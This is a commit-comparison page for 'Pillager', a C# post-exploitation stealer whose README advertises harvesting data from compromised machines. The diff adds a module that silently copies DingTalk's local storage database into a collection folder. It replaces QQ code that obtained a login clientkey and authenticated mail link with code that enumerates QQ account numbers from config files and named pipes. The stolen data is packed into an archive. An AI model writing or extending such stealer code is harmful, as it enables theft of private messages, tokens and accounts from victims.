Compare commits
3 Commits
0d6814fa2c
...
f370916454
| Author | SHA1 | Date |
|---|---|---|
簞純
|
f370916454 | |
|
簞純
|
4ee4457189 | |
|
簞純
|
bdc9e1965d |
|
|
@ -8,6 +8,8 @@ namespace Pillager.Helper
|
|||
{
|
||||
public static class Native
|
||||
{
|
||||
[DllImport("shell32.dll")]
|
||||
public static extern int SHGetFolderPath(IntPtr hwndOwner, int nFolder, IntPtr hToken, uint dwFlags, [Out] StringBuilder pszPath);
|
||||
[DllImport("user32.dll", SetLastError = true)]
|
||||
public static extern bool SetProcessDPIAware();
|
||||
[DllImport("ntdll", SetLastError = true)]
|
||||
|
|
|
|||
|
|
@ -0,0 +1,33 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.Messengers
|
||||
{
|
||||
internal class DingTalk
|
||||
{
|
||||
public static string MessengerName = "DingTalk";
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
string storagepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DingTalk\\globalStorage\\storage.db");
|
||||
if (!File.Exists(storagepath)) return;
|
||||
string storageshmpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DingTalk\\globalStorage\\storage.db-shm");
|
||||
string storagewalpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DingTalk\\globalStorage\\storage.db-wal");
|
||||
string savepath = Path.Combine(path, MessengerName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
File.Copy(storagepath, Path.Combine(savepath, "storage.db"));
|
||||
if (File.Exists(storageshmpath))
|
||||
File.Copy(storageshmpath, Path.Combine(savepath, "storage.db-shm"));
|
||||
if (File.Exists(storagewalpath))
|
||||
File.Copy(storagewalpath, Path.Combine(savepath, "storage.db-wal"));
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -1,6 +1,7 @@
|
|||
using System;
|
||||
using Pillager.Helper;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.Messengers
|
||||
|
|
@ -9,139 +10,68 @@ namespace Pillager.Messengers
|
|||
{
|
||||
public static string MessengerName = "QQ";
|
||||
|
||||
public static string get_pt_local_token()
|
||||
|
||||
|
||||
public static string GetCommonDocumentsFolder()
|
||||
{
|
||||
try
|
||||
{
|
||||
Uri uri = new Uri(@"https://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https%3A//qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&style=22&target=self&s_url=https%3A%2F%2Fqzs.qzone.qq.com%2Fqzone%2Fv5%2Floginsucc.html%3Fpara%3Dizone");
|
||||
|
||||
HttpWebRequest myRequest = (HttpWebRequest)WebRequest.Create(uri);
|
||||
myRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
myRequest.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8";
|
||||
myRequest.Referer = "https://i.qq.com/";
|
||||
HttpWebResponse response = (HttpWebResponse)myRequest.GetResponse();
|
||||
string temp = response.Headers.Get("Set-Cookie");
|
||||
string[] cookstr = temp.Replace(" ", "").Split(new char[] { ',', ';' });
|
||||
string pt_local_token = "";
|
||||
foreach (string str in cookstr)
|
||||
{
|
||||
string[] cookieNameValue = str.Split('=');
|
||||
if (cookieNameValue[0] == "pt_local_token")
|
||||
pt_local_token = cookieNameValue[1];
|
||||
}
|
||||
return pt_local_token;
|
||||
}
|
||||
catch
|
||||
{
|
||||
return "";
|
||||
}
|
||||
|
||||
int SIDL_COMMON_DOCUMENTS = 0x002e;
|
||||
StringBuilder sb = new StringBuilder();
|
||||
Native.SHGetFolderPath(IntPtr.Zero, SIDL_COMMON_DOCUMENTS, IntPtr.Zero, 0x0000, sb);
|
||||
return sb.ToString();
|
||||
}
|
||||
|
||||
public static string get_unis(string pt_local_token)
|
||||
public static string get_qq()
|
||||
{
|
||||
try
|
||||
List<string> all = new List<string>();
|
||||
List<string> online = new List<string>();
|
||||
string inifile = Path.Combine(GetCommonDocumentsFolder(), "Tencent\\QQ\\UserDataInfo.ini");
|
||||
if (File.Exists(inifile))
|
||||
{
|
||||
Uri uri = new Uri(@"https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_CB&pt_local_tk=" + pt_local_token);
|
||||
HttpWebRequest myRequest = (HttpWebRequest)WebRequest.Create(uri);
|
||||
myRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
myRequest.Accept = "*/*";
|
||||
myRequest.Referer = "https://xui.ptlogin2.qq.com/";
|
||||
myRequest.CookieContainer = new CookieContainer();
|
||||
myRequest.CookieContainer.Add(new Cookie("pt_local_token", pt_local_token, "/", ".qq.com"));
|
||||
myRequest.CookieContainer.Add(new Cookie("_qz_referrer", "i.qq.com", "/", ".qq.com"));
|
||||
HttpWebResponse response = (HttpWebResponse)myRequest.GetResponse();
|
||||
Stream temp = response.GetResponseStream();
|
||||
using (StreamReader sr = new StreamReader(temp))
|
||||
try
|
||||
{
|
||||
string content = sr.ReadToEnd();
|
||||
string[] cookstr = content.Replace(" ", "").Split(new char[] { ',', ':' });
|
||||
if (cookstr.Length > 0)
|
||||
return cookstr[1];
|
||||
Pixini pixini = Pixini.Load(inifile);
|
||||
pixini.Save(inifile);
|
||||
string type = pixini.Get("UserDataSavePathType", "UserDataSet", "1");
|
||||
string folder = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), "Tencent Files");
|
||||
if (type == "2")
|
||||
{
|
||||
folder = pixini.Get("UserDataSavePath", "UserDataSet", "");
|
||||
}
|
||||
foreach (string s in Directory.GetDirectories(folder))
|
||||
{
|
||||
string name = Path.GetFileName(s);
|
||||
if (!name.Contains("All Users")) all.Add(name);
|
||||
}
|
||||
}
|
||||
return "";
|
||||
catch { }
|
||||
}
|
||||
catch
|
||||
foreach (var qq in Directory.GetFiles(@"\\.\Pipe\"))
|
||||
{
|
||||
return "";
|
||||
if (qq.Contains(@"\\.\Pipe\QQ_") && qq.Contains(@"_pipe")) online.Add(qq.Replace(@"\\.\Pipe\QQ_", "").Replace("_pipe", ""));
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public static string get_qkey(string pt_local_token, string uin)
|
||||
{
|
||||
try
|
||||
StringBuilder sb = new StringBuilder();
|
||||
if (all.Count > 0)
|
||||
{
|
||||
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(new Uri(@"https://localhost.ptlogin2.qq.com:4301/pt_get_st?clientuin=" + uin + "&r=0.1111111111111111&pt_local_tk=" + pt_local_token + "&callback=__jp0"));
|
||||
request.CookieContainer = new CookieContainer();
|
||||
request.CookieContainer.Add(new Cookie("pt_local_token", pt_local_token, "/", ".qq.com"));
|
||||
request.CookieContainer.Add(new Cookie("clientuin", "uin", "/", ".qq.com"));
|
||||
request.CookieContainer.Add(new Cookie("pt2gguin", "o" + uin + "_qz_referrer=i.qq.com", "/", ".qq.com"));
|
||||
request.Referer = "https://xui.ptlogin2.qq.com/";
|
||||
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
request.Accept = "*/*";
|
||||
HttpWebResponse response2 = (HttpWebResponse)request.GetResponse();
|
||||
string temp = response2.Headers.Get("Set-Cookie");
|
||||
string[] cookstr = temp.Replace(" ", "").Split(new char[] { ',', ';' });
|
||||
foreach (string str in cookstr)
|
||||
{
|
||||
string[] cookieNameValue = str.Split('=');
|
||||
if (cookieNameValue[0] == "clientkey")
|
||||
return cookieNameValue[1];
|
||||
}
|
||||
return "";
|
||||
sb.AppendLine("All QQ number:");
|
||||
sb.AppendLine(string.Join(" ", all.ToArray()));
|
||||
}
|
||||
catch
|
||||
if (online.Count > 0)
|
||||
{
|
||||
return "";
|
||||
sb.AppendLine("Online QQ number:");
|
||||
sb.AppendLine(string.Join(" ", online.ToArray()));
|
||||
}
|
||||
}
|
||||
|
||||
public static string get_link(string clientkey, string uin)
|
||||
{
|
||||
try
|
||||
{
|
||||
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(new Uri("https://ptlogin2.qq.com/jump?clientuin=" + uin + "&clientkey=" + clientkey + "&keyindex=9&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=25"));
|
||||
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
|
||||
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
|
||||
Stream temp = response.GetResponseStream();
|
||||
using (StreamReader sr = new StreamReader(temp))
|
||||
{
|
||||
string content = sr.ReadToEnd();
|
||||
string[] cookstr = content.Replace(" ", "").Split(new char[] { '\'' });
|
||||
if (cookstr.Length > 0)
|
||||
return cookstr[3];
|
||||
}
|
||||
return "";
|
||||
}
|
||||
catch
|
||||
{
|
||||
return "";
|
||||
}
|
||||
|
||||
return sb.ToString();
|
||||
}
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
ServicePointManager.SecurityProtocol = (SecurityProtocolType)(768 | 3072);
|
||||
string pt_local_token = get_pt_local_token();
|
||||
if (pt_local_token == "") return;
|
||||
string uin = get_unis(pt_local_token);
|
||||
if (uin == "") return;
|
||||
string clientkey = get_qkey(pt_local_token, uin);
|
||||
if (clientkey == "") return;
|
||||
string link = get_link(clientkey, uin);
|
||||
if (link == "") return;
|
||||
|
||||
string result = get_qq();
|
||||
if (string.IsNullOrEmpty(result)) return;
|
||||
string savepath = Path.Combine(path, MessengerName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
StringBuilder sb = new StringBuilder();
|
||||
sb.AppendLine("QQ:" + uin);
|
||||
sb.AppendLine("Mail:" + link);
|
||||
File.WriteAllText(Path.Combine(savepath, MessengerName + "_ClientKey.txt"), sb.ToString());
|
||||
File.WriteAllText(Path.Combine(savepath, "QQ.txt"), result);
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
|
|
|
|||
|
|
@ -55,10 +55,11 @@ namespace Pillager.Messengers
|
|||
try
|
||||
{
|
||||
if (!Directory.Exists(MessengerPaths[0]) && !Directory.Exists(MessengerPaths[1])) return;
|
||||
string savepath = Path.Combine(path, MessengerName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
string Desktop = Skype_cookies(MessengerPaths[0]);
|
||||
string Store = Skype_cookies(MessengerPaths[1]);
|
||||
if (string.IsNullOrEmpty(Desktop) && string.IsNullOrEmpty(Store)) return;
|
||||
string savepath = Path.Combine(path, MessengerName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
if (!String.IsNullOrEmpty(Desktop)) File.WriteAllText(Path.Combine(savepath, MessengerName + "_Desktop.txt"), Desktop);
|
||||
if (!String.IsNullOrEmpty(Store)) File.WriteAllText(Path.Combine(savepath, MessengerName + "_Store.txt"), Store);
|
||||
}
|
||||
|
|
|
|||
|
|
@ -73,6 +73,7 @@
|
|||
<Compile Include="Helper\VaultCli.cs" />
|
||||
<Compile Include="Mails\Foxmail.cs" />
|
||||
<Compile Include="Mails\MailMaster.cs" />
|
||||
<Compile Include="Messengers\DingTalk.cs" />
|
||||
<Compile Include="Messengers\Enigma.cs" />
|
||||
<Compile Include="Messengers\QQ.cs" />
|
||||
<Compile Include="Messengers\Skype.cs" />
|
||||
|
|
|
|||
|
|
@ -55,6 +55,7 @@ namespace Pillager
|
|||
Telegram.Save(savepath);
|
||||
Skype.Save(savepath);
|
||||
Enigma.Save(savepath);
|
||||
DingTalk.Save(savepath);
|
||||
|
||||
//Tar.gz
|
||||
Tar.Pack(savepath, savezippath);
|
||||
|
|
|
|||
13
README.md
13
README.md
|
|
@ -42,12 +42,13 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
|
|||
|
||||
注:✅表示经过测试,🚧表示理论上支持但未经测试,❌表示无此功能或不支持
|
||||
|
||||
| IM | Support |
|
||||
| :-----------------: | :---------------: |
|
||||
| QQ(最新版本不可用)) | ClientKey(Mail) |
|
||||
| Telegram | tdata |
|
||||
| Skype | Token |
|
||||
| Enigma | DeviceID/Datebase |
|
||||
| IM | Support |
|
||||
| :------: | :---------------: |
|
||||
| QQ | QQ Number |
|
||||
| Telegram | tdata |
|
||||
| Skype | Token |
|
||||
| Enigma | DeviceID/Datebase |
|
||||
| DingTalk | Storage |
|
||||
|
||||
| Tool | Support |
|
||||
| :--------: | :------: |
|
||||
|
|
|
|||
Loading…
Reference in New Issue